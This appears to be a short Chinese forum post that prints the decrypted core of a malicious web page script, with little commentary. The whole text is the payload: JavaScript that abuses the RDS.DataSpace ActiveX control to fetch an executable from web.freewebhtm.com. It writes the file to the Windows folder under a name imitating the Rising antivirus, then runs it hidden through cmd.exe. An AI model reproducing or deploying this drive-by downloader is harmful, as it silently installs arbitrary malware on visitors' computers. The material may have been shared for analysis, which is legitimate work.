主要解密部分解密:
- <SCRIPT language=javascript>
- function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}try
- {aaa="obj";
- bbb="ect";
- ccc="Adodb.";
- ddd="Stream";
- eee="Microsoft.";
- fff="XMLHTTP";
- lj='http://web.freewebhtm.com/soft.exe';
- var df=document.createElement(aaa+bbb);
- df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
- var x=df.CreateObject(eee+fff,"");
- var S=df.CreateObject(ccc+ddd,"");
- S.type=1;
- x.open("GET", lj,0);
- x.send(); mz1=gn(1000);
- var F=df.CreateObject("Scripting.FileSystemObject","");
- var tmp=F.GetSpecialFolder(0);var t2;
- t2=F.BuildPath(tmp,"rising"+mz1);
- mz1= F.BuildPath(tmp,mz1);S.Open();
- S.Write(x.responseBody);
- S.SaveToFile(mz1,2);
- S.Close();
- F.MoveFile(mz1,t2);
- var Q=df.CreateObject("Shell.Application","");
- exp1=F.BuildPath(tmp+'\\system32','cmd.exe');
- Q.ShellExecute(exp1,' /c '+t2,"","open",0);}catch(i){i=1;}
- </SCRIPT>
复制代码 |